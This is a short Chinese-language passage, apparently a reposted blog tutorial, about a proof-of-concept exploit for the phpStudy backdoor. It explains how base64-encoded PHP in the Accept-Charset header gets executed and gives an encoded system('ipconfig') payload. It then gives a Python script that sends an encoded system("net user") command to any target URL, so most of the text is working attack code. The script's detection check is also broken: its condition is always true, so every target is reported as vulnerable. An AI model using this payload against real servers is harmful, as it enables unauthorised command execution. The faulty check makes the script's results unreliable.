Accept-Encoding要把gzip, deflate 里逗号后面的空格去掉,不然命令执行不成功
Accept-Charset 的值就是执行的命令, 需要进行base64编码
构造Payload:
// 执行命令 system(‘ipconfig‘) ;
accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=
# -*-coding:utf-8 -*-
import requests
import sys
import base64
def Poc(ip):
payload = "echo \"hello phpstudy\";"
poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
pay = base64.b64encode(payload.encode(‘utf-8‘))
#poc = str(pay,"utf-8")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Connection": "close",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": poc,
"Upgrade-Insecure-Requests": "1",
}
url = ip
r = requests.get(url,headers=headers)
#print(r.text)
if "Administrator" or "DefaultAccount" in r.text:
print("存在phpstudy后门")
else:
print("不存在phpstudy后门")
if len(sys.argv) < 2:
print("python phpstudy.py http://127.0.0.1")
else:
Poc(sys.argv[1])
原文:https://www.cnblogs.com/Frieza/p/14596488.html